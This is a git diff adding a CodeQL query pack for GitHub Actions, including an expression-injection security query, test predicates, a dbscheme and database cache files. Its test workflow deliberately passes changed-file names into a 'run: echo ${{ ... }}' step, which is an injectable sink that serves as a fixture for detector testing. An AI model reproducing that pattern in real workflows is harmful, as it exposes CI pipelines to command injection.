/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] Log file was started late. +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json +[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" + ] +[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. +[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Terminating normally. diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3dbf073c49924685cbbad30b59944af574c77ae9 GIT binary patch literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& literal 0 HcmV?d00001 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql new file mode 100644 index 00000000000..2e358f3c30b --- /dev/null +++ b/ql/lib/test/test.ql @@ -0,0 +1,59 @@ +import codeql.actions.ast.internal.Actions +import codeql.actions.Ast +import codeql.actions.Cfg as Cfg +import codeql.actions.DataFlow +import codeql.Locations + +query predicate files(File f) { any() } + +query predicate yamlNodes(YamlNode n) { any() } + +query predicate jobNodes(JobStmt s) { any() } + +query predicate stepNodes(StepStmt s) { any() } + +query predicate usesNodes(UsesExpr s) { any() } + +query predicate usesSteps(UsesExpr call, string argname, Expression arg) { + call.getArgument(argname) = arg +} + +query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } + +query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } + +query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } + +query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } + +query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { + id = va.getStepId() and var = va.getVarName() +} + +query predicate orphanVarAccesses(ExprAccessExpr va, string var) { + var = va.getExpression() and + not exists(AstNode n | n = va.getParentNode()) +} + +query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { + var = va.getExpression() and + parent = va.getParentNode() +} + +query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } + +query predicate cfgNodes(Cfg::Node n) { any() } + +query predicate dfNodes(DataFlow::Node e) { any() } + +query predicate exprNodes(DataFlow::ExprNode e) { any() } + +query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } + +query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } + +query predicate usesIds(UsesExpr s, string a) { s.getId() = a } + +query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } + +query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } diff --git a/ql/lib/test/test.yml b/ql/lib/test/test.yml new file mode 100644 index 00000000000..2760a6c3d35 --- /dev/null +++ b/ql/lib/test/test.yml @@ -0,0 +1,36 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme new file mode 100644 index 00000000000..20d83c71ee6 --- /dev/null +++ b/ql/lib/yaml.dbscheme @@ -0,0 +1,80 @@ +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats new file mode 100644 index 00000000000..1c35ae98402 --- /dev/null +++ b/ql/lib/yaml.dbscheme.stats @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql new file mode 100644 index 00000000000..f8d6e0c804b --- /dev/null +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 00000000000..56f10b81e0c --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml new file mode 100644 index 00000000000..f4c43168664 --- /dev/null +++ b/ql/src/qlpack.yml @@ -0,0 +1,14 @@ +--- +library: false +name: codeql/actions-queries +version: 0.0.1 +groups: + - actions + - queries +suites: codeql-suites +extractor: yaml +defaultSuiteFile: codeql-suites/actions-code-scanning.qls +dependencies: + codeql/actions-all: ${workspace} +warnOnImplicitThis: true +tests: test diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json new file mode 100644 index 00000000000..9e26dfeeb6e --- /dev/null +++ b/ql/src/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml new file mode 100644 index 00000000000..1dedebb70be --- /dev/null +++ b/ql/src/test-db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.1 + creationTime: 2024-02-03T09:17:52.592220Z +finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..d14fdc5df9e27d6e8465f5feee0cd63125b6c0c2 GIT binary patch literal 28 TcmZQz00Slng&^}g^^O4m1iu0A literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|N8l!2HLh-`p#3Y2XNq&Gp?c0l?zlx+`Grw3&_0NE3vY)2sb7L@J8 Rz`z934>Hpk$nJ%*T>#m>2kQU; literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e new file mode 100644 index 0000000000000000000000000000000000000000..aa6e82a1af6251f999da1af2e24d6aa1a2d5e799 GIT binary patch literal 80 zcmZQzU|{$?SD_V1DKjuI8UyJRAZ-GqHvwr=AblH1n*p&N5Ss(>L?E^R;#)v$$-uy5 N3#6@pbT5#$1^|N{2($nI literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet new file mode 100644 index 0000000000000000000000000000000000000000..9dd66f44ba43d16112ac3705b3f6dc6cd2675f8b GIT binary patch literal 4776 zcmXxl1+pO@WSSKB zOUbk;?hlgbQak`8)2Eo{MrKIysvwy$#cP0MrWCIUl9^MyHb{Dx%aR$$Tl^8zihV9uATP zQal1AtUKNhB&<6g2@=*F9{`d*DLx1!>;pUsB#Wf@Fp#h>@DU(cEX7BGgnfcXgM@v8 zj|It+DLx(~>>GR%NS03V$sk!K#ixQ~*%Y4+680HB6C~_2d^SjyPw}}R>6hX$DOn-K z7l4F)h&xlVVv5ItWI&292FXe(z7!p`+wif;tT>M6bnB!tVskZ=z0gCH50;)g)8L5d#%$%ZL@ z3?v(+_z93~oHDm&ew+Bdnct?mncrr*ncwERnco(=nctSWncr5rncvpBncp_Lncud$ zncsH0ncw!hnICgwF3tP~<^5YWFRdMY|29Ylr;NV~lATigeoBU<_(PEFoZ^o_!aagN z1_}2F{uCs;rTBA@aIfGmL9%;_zXr*$6n_g6?j8IcNcK$e4dG+_UxfSJNkJ?iq55=3XJE>UG*|ou=2*r|W_G49z`2&eR*X z**Z&as?XM&>vQy$`drO9Cg*9+Eg7RZr{sLixg-~8&L!#8JC$0k3pMACjMbboa*-a| zCii|lKh6=kL~}04rJ8d=F4LR?a=B*TlPmPdHu-;|zMp+fuF~vda&^p_rIl-R)~#}_ z&N@}D(^;3w^*ZZNxj|RWZ5W92rT=T^C0=ebqx z(0NXkJ9VB*lgIT z`bGVVeo6nPU)F!4j()qm=NI{T`|H_(6Ujdb=|jc=m=)tl+;yBgo3 z?JjvKZ>94=d25}0S>9G>UzWGm-&f4ZhB9heO=>w z>+X8E&OWd45xR%oUuWOf_yKwneX!0ssPRK|&Ov#Uo?IWUb1rK9NIj)KR_C15`0;vb zeS*%psqvHawE7gCb5!G}>FMqkHM|b5_9=Zss?qZswPBTjS0A=GM*pa*k`fncuv+nP1LzjW_d~UpMnxKsWR2 Yt(*BRs5|TDwz@2&oB8$8&HNVrAKWXY0ssI2 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 new file mode 100644 index 0000000000000000000000000000000000000000..5d863c8ae718a6bd8aef9eef33ef17233531c555 GIT binary patch literal 16 RcmZQz00Tx4DWv-TKL7)*0w(|f literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# 